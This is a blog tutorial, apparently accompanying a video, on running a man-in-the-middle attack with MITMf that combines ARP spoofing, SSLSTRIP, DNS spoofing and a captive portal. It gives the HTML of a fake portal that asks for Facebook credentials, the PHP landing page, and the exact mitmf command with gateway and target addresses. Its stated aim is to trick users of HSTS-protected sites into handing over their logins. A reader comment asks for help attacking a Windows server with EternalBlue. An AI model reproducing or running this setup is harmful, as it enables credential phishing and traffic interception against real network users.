Using MITMF with SSLSTRIP and Captive Portal options

In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously.
In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option.
Please review the videos listed below, if needed:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers

We saw in the previous videos that websites correctly configured for HSTS, can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured - which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks.
Because it is unlikely for a user to browse ONLY correctly configured HSTS websites; an attacker can redirect the SSLSTRIP vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media credentials, email credentials, etc)

Captive Portal

The test Captive Portal in the video is a very basic one which uses two files under the /var/www/html/form1 directory: index.html and welcome.php

index.html

<form action="welcome.php" method="post">
Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>

welcome.php

<html>
<body>
Enjoy tour browsing!
</body>
</html>

An attacker in a real scenario, would make the Captive Portal webpage fancier and more convincing.

MITMF

MITMF can be installed from the Kali Linux repository; but in order to use the Captive Portal option, MITMF has to be installed from GitHub - from the following location: https://github.com/byt3bl33d3r/MITMf

The following MITMF command was used to initiate the man-in-the-middle attack using ARP spoofing, SSLSTRIP and Captive Portal options:

./mitmf.py -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70 --captive --portalurl http://192.168.254.176/form1

Using MITMF with SSLSTRIP and Captive Portal options




Comments

  1. please help, erro " python mitmf.py
    :0: UserWarning: You do not have a working installation of the service_identity module: 'cannot import name opentype'. Please install it from and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
    Traceback (most recent call last):
    File "mitmf.py", line 36, in
    from plugins import *
    File "/root/programas/MITMf/plugins/filepwn.py", line 72, in
    from libs.bdfactory import pebin
    ImportError: No module named bdfactory "

    ReplyDelete
  2. Replies
    1. Looks like you didn't install all the prerequisites ... ?

      Delete
    2. How did you solved it? I have the same issue.

      Delete
  3. Hi, how're doing?... Well I have a problem hacking into a windows server 2012 R2... I'm using eternalblue. Plz show me how to do itπŸ™πŸ™πŸ™πŸ™πŸ™

    ReplyDelete
  4. my mitmf is not showing any captured traffic

    ReplyDelete

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux